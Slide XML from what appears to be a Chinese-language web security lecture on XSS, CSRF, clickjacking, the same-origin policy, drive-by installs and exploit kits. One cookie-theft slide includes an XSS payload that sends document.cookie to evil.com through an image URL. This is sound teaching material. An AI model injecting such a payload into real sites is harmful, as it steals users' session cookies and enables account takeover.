              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Site Scripting (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>跨站请求伪造：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Cross </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>点击劫持：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Clickjacking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服务端攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CGI shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>脚本注入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/>
              <a:t>HTML5的安全性改进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04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SOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>适用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XHR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合法：请求同源的对象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$.get(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server.php?var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='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my_val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/>
              <a:t>不合法：请求异源的对象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$.get(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‘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https://attacker.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com/’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8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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>应用的安全隐患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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>应用通常有一定的权威性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>客户端和服务端会涉及敏感数据访问</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通过滥用该权威性攻击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en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>数据泄露</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>网站破坏</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>隐私问题</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>病毒传播</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>网络跳板</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-C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攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>客户端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 Site Scripting (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clickjacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3944355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浏览器的价值和安全挑战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浏览器保存了大量的敏感数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>历史记录</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用户名、密码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Cookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>浏览器需要防止黑客窃取这些信息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9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656"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3656"/>
              <a:t>安全模型</a:t>
            </a:r>
            <a:endParaRPr sz="3656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攻击者目标：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>窃取浏览器中的数据，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>浏览器的防护目标：分离不同源的代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>防止攻击者窃取信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如果攻击者引诱用户点击恶意链接，如何保证安全？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>访问攻击者控制的网站</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>按特定（攻击）方式访问正当网站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7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利用浏览器漏洞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浏览器是复杂的软件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>网络协议栈、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>HTML/CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>解析、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>引擎都可能存在漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>插件进一步扩大了浏览器的漏洞范围</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Flash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Java, Acrobat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, …</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>插件（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Plugins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）在浏览器沙箱外执行代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击者可以利用浏览器漏洞定制攻击脚本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通过恶意页面触发</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Drive-by Install</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：强制浏览器下载并运行文件，如木马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38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Drive-by Install</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>示例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4" y="3955742"/>
            <a:ext cx="816747" cy="81674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452826" y="3839651"/>
            <a:ext cx="1109590" cy="1224143"/>
            <a:chOff x="8803850" y="4570116"/>
            <a:chExt cx="1365649" cy="1506637"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="TextBox 5"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8805113" y="5655337"/>
              <a:ext cx="1253202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恶意网站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3850" y="4706001"/>
              <a:ext cx="893446" cy="89344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7617" y="4570116"/>
              <a:ext cx="641882" cy="641882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1" y="2827937"/>
            <a:ext cx="1011714" cy="101171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84137" y="2758636"/>
            <a:ext cx="1874708" cy="1197105"/>
            <a:chOff x="1334322" y="2603937"/>
            <a:chExt cx="2307333" cy="1473360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="16" name="Curved Connector 15"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="11" idx="3"/>
              <a:endCxn id="4" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1460793" y="3311823"/>
              <a:ext cx="1161062" cy="765474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34322" y="2603937"/>
              <a:ext cx="2307333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1</a:t>
              </a:r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) </a:t>
              </a:r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发送恶意链接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80770" y="2721126"/>
            <a:ext cx="5025587" cy="1376102"/>
            <a:chOff x="3053255" y="2557770"/>
            <a:chExt cx="6185338" cy="1693664"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Freeform 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3053255" y="3023361"/>
              <a:ext cx="6185338" cy="1228073"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 6185338"/>
                <a:gd name="connsiteY0" fmla="*/ 1228073 h 1228073"/>
                <a:gd name="connsiteX1" fmla="*/ 1508235 w 6185338"/>
                <a:gd name="connsiteY1" fmla="*/ 161273 h 1228073"/>
                <a:gd name="connsiteX2" fmla="*/ 5044966 w 6185338"/>
                <a:gd name="connsiteY2" fmla="*/ 108722 h 1228073"/>
                <a:gd name="connsiteX3" fmla="*/ 6185338 w 6185338"/>
                <a:gd name="connsiteY3" fmla="*/ 1170267 h 12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5338" h="1228073">
                  <a:moveTo>
                    <a:pt x="0" y="1228073"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="333703" y="787952"/>
                    <a:pt x="667407" y="347831"/>
                    <a:pt x="1508235" y="161273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2349063" y="-25286"/>
                    <a:pt x="4265449" y="-59444"/>
                    <a:pt x="5044966" y="108722"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5824483" y="276888"/>
                    <a:pt x="6004910" y="723577"/>
                    <a:pt x="6185338" y="1170267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61485" y="2557770"/>
              <a:ext cx="4088862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2) GET /exploit.html HTTP/1.1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1533351" y="4270154"/>
            <a:ext cx="611883" cy="611883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638754" y="3232608"/>
            <a:ext cx="4790746" cy="1035413"/>
            <a:chOff x="3247697" y="3187287"/>
            <a:chExt cx="5896303" cy="1274354"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Freeform 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3247697" y="3587397"/>
              <a:ext cx="5896303" cy="874244"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 5896303 w 5896303"/>
                <a:gd name="connsiteY0" fmla="*/ 874244 h 874244"/>
                <a:gd name="connsiteX1" fmla="*/ 4598275 w 5896303"/>
                <a:gd name="connsiteY1" fmla="*/ 143775 h 874244"/>
                <a:gd name="connsiteX2" fmla="*/ 1392620 w 5896303"/>
                <a:gd name="connsiteY2" fmla="*/ 59693 h 874244"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 5896303"/>
                <a:gd name="connsiteY3" fmla="*/ 832203 h 87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6303" h="874244">
                  <a:moveTo>
                    <a:pt x="5896303" y="874244"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="5622596" y="576888"/>
                    <a:pt x="5348889" y="279533"/>
                    <a:pt x="4598275" y="143775"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3847661" y="8016"/>
                    <a:pt x="2158999" y="-55045"/>
                    <a:pt x="1392620" y="59693"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="626241" y="174431"/>
                    <a:pt x="313120" y="503317"/>
                    <a:pt x="0" y="832203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68877" y="3187287"/>
              <a:ext cx="2653941" cy="42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3) HTTP/1.1 200 OK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87515" y="3714659"/>
            <a:ext cx="4760858" cy="758314"/>
            <a:chOff x="3184634" y="3780580"/>
            <a:chExt cx="5859518" cy="933310"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Freeform 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3184634" y="4198695"/>
              <a:ext cx="5859518" cy="515195"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 5859518"/>
                <a:gd name="connsiteY0" fmla="*/ 515195 h 515195"/>
                <a:gd name="connsiteX1" fmla="*/ 1634359 w 5859518"/>
                <a:gd name="connsiteY1" fmla="*/ 36974 h 515195"/>
                <a:gd name="connsiteX2" fmla="*/ 4487918 w 5859518"/>
                <a:gd name="connsiteY2" fmla="*/ 84271 h 515195"/>
                <a:gd name="connsiteX3" fmla="*/ 5859518 w 5859518"/>
                <a:gd name="connsiteY3" fmla="*/ 499429 h 51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518" h="515195">
                  <a:moveTo>
                    <a:pt x="0" y="515195"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="443186" y="311995"/>
                    <a:pt x="886373" y="108795"/>
                    <a:pt x="1634359" y="36974"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2382345" y="-34847"/>
                    <a:pt x="3783725" y="7195"/>
                    <a:pt x="4487918" y="84271"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5192111" y="161347"/>
                    <a:pt x="5525814" y="330388"/>
                    <a:pt x="5859518" y="499429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9613" y="3780580"/>
              <a:ext cx="3880909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4) GET /rootkit.exe HTTP/1.1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13134" y="4674633"/>
            <a:ext cx="4760858" cy="753319"/>
            <a:chOff x="3216165" y="4962089"/>
            <a:chExt cx="5859518" cy="927163"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Freeform 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3216165" y="4962089"/>
              <a:ext cx="5859518" cy="402990"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 5859518"/>
                <a:gd name="connsiteY0" fmla="*/ 515195 h 515195"/>
                <a:gd name="connsiteX1" fmla="*/ 1634359 w 5859518"/>
                <a:gd name="connsiteY1" fmla="*/ 36974 h 515195"/>
                <a:gd name="connsiteX2" fmla="*/ 4487918 w 5859518"/>
                <a:gd name="connsiteY2" fmla="*/ 84271 h 515195"/>
                <a:gd name="connsiteX3" fmla="*/ 5859518 w 5859518"/>
                <a:gd name="connsiteY3" fmla="*/ 499429 h 51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9518" h="515195">
                  <a:moveTo>
                    <a:pt x="0" y="515195"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="443186" y="311995"/>
                    <a:pt x="886373" y="108795"/>
                    <a:pt x="1634359" y="36974"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2382345" y="-34847"/>
                    <a:pt x="3783725" y="7195"/>
                    <a:pt x="4487918" y="84271"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5192111" y="161347"/>
                    <a:pt x="5525814" y="330388"/>
                    <a:pt x="5859518" y="499429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19520" y="5467835"/>
              <a:ext cx="3552653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5) HTTP/1.1 200 OK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1" b="31992"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="871703">
            <a:off x="1232155" y="4072330"/>
            <a:ext cx="1744141" cy="6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4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容易操作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Drive-by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击背后是一个成熟的市场</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击脚本包包含了数十、上百个攻击工具</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>由一群专业的黑帽子（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>blackhats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）维护</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>新手很容易使用，不需要考虑底层实现细节</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>MPack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Angler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Nuclear </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>EX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通常在被入侵的正当站点中使用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>站点被攻击和篡改，重定向到攻击者的网站</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击者站点托管攻击脚本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>任何访问正当网站的用户在未察觉时被攻击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113E6BE-D46A-4824-8C2F-15B7FCC2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假如浏览器没有漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>…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Drive-by-Install</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>依赖</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>恶意链接</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>浏览器漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>其它攻击方式？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>利用代码、安全策略逻辑漏洞？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42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656"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3656"/>
              <a:t>窃取</a:t>
            </a:r>
            <a:endParaRPr sz="3656" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="417" name="Shape 417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ts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400"/>
              <a:t>DOM API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>获取</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" err="1"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0"/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400"/>
              <a:t>同源规则会限制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>访问</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>比如访问：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>attacker.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>attacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>不能访问内嵌网页（如银行）的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>通过脚本注入绕过同源规则？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr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D9F0C2-9C05-4F97-B4B1-74AA479420AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043193" y="4012095"/>
            <a:ext cx="7819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it-IT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.write(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it-IT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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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'&lt;img src="http://evil.com/c.jpg?'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it-IT" sz="180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+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it-IT" sz="180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document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.cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="180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+</a:t>
            </a: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it-IT" sz="180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'"&gt;'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lang="it-IT" sz="180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D936D9-6EED-4B57-8185-557B36EC8D7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043193" y="6223433"/>
            <a:ext cx="7547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https://developer.mozilla.org/en-US/docs/Web/API/Document/cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="86058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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>应用架构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9DAB0C-2912-4AC4-9269-74250A6D8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0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跨站脚本攻击（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>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/>
              <a:t>运行来自不可信源的脚本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CN" altLang="en-US"/>
              <a:t>通常会破坏文档数据或网页功能的完整性（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Integrity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）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zh-CN" altLang="en-US"/>
              <a:t>文档由可信的、开发者编写的对象和（不可信）的用户输入组成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CN" altLang="en-US"/>
              <a:t>如果用户输入被解析成文档元素，会导致恶意代码执行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zh-CN" altLang="en-US"/>
              <a:t>攻击目标举例：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zh-CN" altLang="en-US"/>
              <a:t>窃取</a:t>
